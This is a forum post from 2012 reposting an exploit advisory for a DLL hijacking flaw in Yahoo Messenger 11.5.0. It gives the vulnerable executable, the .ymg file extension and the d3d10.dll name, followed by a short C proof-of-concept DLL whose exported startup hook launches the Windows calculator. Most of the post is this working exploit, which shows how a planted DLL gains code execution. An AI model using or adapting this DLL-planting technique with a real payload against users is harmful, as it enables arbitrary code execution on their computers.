co4ie Posted August 25, 2012 Report Share Posted August 25, 2012 Exploit Title: yahoo messenger 11.5.0 (d3d10.dll) DLL Hijacking ExploitDate: 2012-08-23Author: coolkavehVersion: 11.5.0228-usTested on: windows XP Sp3 ENG---------------------------------------------------------# Vulnerable: yahoomessenger.exe---------------------------------------------------------# Vulnerable extensions: .ymg---------------------------------------------------------# Vulnerable Dll: d3d10.dll---------------------------------------------------------#include <windows.h>#define DllExport __declspec (dllexport)DllExport void hook_startup() { exp(); }int exp(){ WinExec("calc", 0); exit(0); return 0;}Sursa Quote Link to comment Share on other sites More sharing options...